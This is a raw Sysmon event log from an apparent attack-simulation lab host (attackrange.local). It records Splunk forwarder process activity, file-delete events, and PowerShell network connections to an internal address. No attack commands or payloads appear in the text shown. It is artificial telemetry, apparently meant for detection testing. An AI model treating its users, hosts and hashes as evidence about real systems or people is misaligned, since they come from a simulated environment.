15:03:04.051{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343105Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:04.051{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-73A8-613B-4CB4-03000000C801}5348C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035343104Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:04.051{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-73A8-613B-4CB4-03000000C801}5348C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035343103Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:04.037{B81B27B7-73A8-613B-4CB4-03000000C801}5348C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035343123Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:05.067{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=99AA5C52B9C45EA68D7D03E31830B6BB,SHA256=D2A595F2C7DFA28465578F857C324F79517683B7153D869CABC09C0FCEB5A0E3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343122Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:05.051{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=67AD216EAED004F8911456EADB015327,SHA256=DF323FA5EB9E3B7B8F1DBFA238B4ADBF4DC6B23AFC492B135A9732E2D650CDCB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035343125Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:32.039{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52510-false10.0.1.12-8000- 23542300x800000000000000035343124Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:06.085{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=74FED8C03C664EA22C27F4F198B06A7D,SHA256=0C1935F8DF966B66AEBDAA9EAB23B89406DD305E60E0F68DB3541DC856819B86,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343126Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:07.102{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9FB8D20400F292E4195AC5462A30DA0C,SHA256=D2777003CF9BA8CF7ADAF66D2AEC437EB048426FF6CA7B747237E3722E79ADE8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343128Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:08.132{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B65D29C73880A56FAA57B3A3CB539454,SHA256=4E75FBCF83CABF94E6C68C1B8CF2A06A47A7B0BE439D54937D50CC61F8D279D5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343127Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:08.001{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=86C247B7868A3D32B00A104F8856A5E8,SHA256=0D846A2026B97CD8999E264CD2A7EFDF0D8B7AD9E90BFE0CBF7B86716366C8A2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035343130Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:33.953{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52511-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035343129Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:09.162{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A29C997F609F25BBA709227FF280DD94,SHA256=4ACC4E63AA1AF7C67E2975683CC146ABC0703B81AF7DF6211BF6108991569D21,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343131Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:10.182{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DEC6537524C07615A28998AB877DD637,SHA256=9C1AC59FBE2259F06D188464CCDA328823939AE6C3E1640933A2C7D3BC530B9B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343132Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:11.201{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4A36A082D1B8B0F5E9E7B57A91145A69,SHA256=83D9337C4967CC4276057F9A83A46AA6DD36C20574D8AEFDCCC9706FC43B5DEF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035343134Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:38.067{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52512-false10.0.1.12-8000- 23542300x800000000000000035343133Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:12.203{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B27E4547F21164794E50DCA59757F1F0,SHA256=CAFEE2370682729D87A3770C96E87E099EE1A6757F9A814C6D49A069B0A26F33,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035343137Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:38.954{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52513-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035343136Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:13.218{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6EA6C82B01ECCDD868CD2D0D970FB623,SHA256=BCF511CB8ABF038259DDB9DEB39598620A49082FE952177850FDCE135D345916,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343135Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:13.049{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=B2962CD187561F56C40EC49A2D3837D6,SHA256=A54856FFB5AB919F13FED65A3ECB67978AF6430CC4D80DB1BB1707C6819FD972,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343138Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:14.233{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C49DA202D8A327A32139DA8955904DA2,SHA256=D70B7E60741C02A9B1EF69971369D7631603A8FF10429D5EBB4F1086E67D0F0A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343139Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:15.249{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=04456CF2C4F2B9FB6E8D055B9642A54C,SHA256=30C22470F9B4BA257E24A4A3181EA24CC66465E8FB95FEF0FF7C3C25A0D64281,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343140Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:16.281{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C76F5B45F7FABD6C638FDB3E7D833BC5,SHA256=827B23BD5CED4B712364FDFA4DBB079C904D988C0CEABB029095EB5251763FA9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035343159Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:17.948{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-73B5-613B-4FB4-03000000C801}408C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343158Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:17.948{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343157Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:17.948{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343156Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:17.948{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343155Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:17.948{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343154Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:17.948{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-73B5-613B-4FB4-03000000C801}408C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035343153Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:17.948{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-73B5-613B-4FB4-03000000C801}408C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035343152Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:17.931{B81B27B7-73B5-613B-4FB4-03000000C801}408C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000035343151Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:17.415{B81B27B7-73B5-613B-4EB4-03000000C801}36006160C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000035343150Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:17.300{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=59EC67E4E3028AFD36514A2D6CC53B16,SHA256=7EED3A4942BF08263231C53CEE45EF466EBBAD29AC68D542954EA2F95A992059,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035343149Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:17.262{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-73B5-613B-4EB4-03000000C801}3600C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343148Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:17.262{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343147Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:17.262{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343146Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:17.262{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343145Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 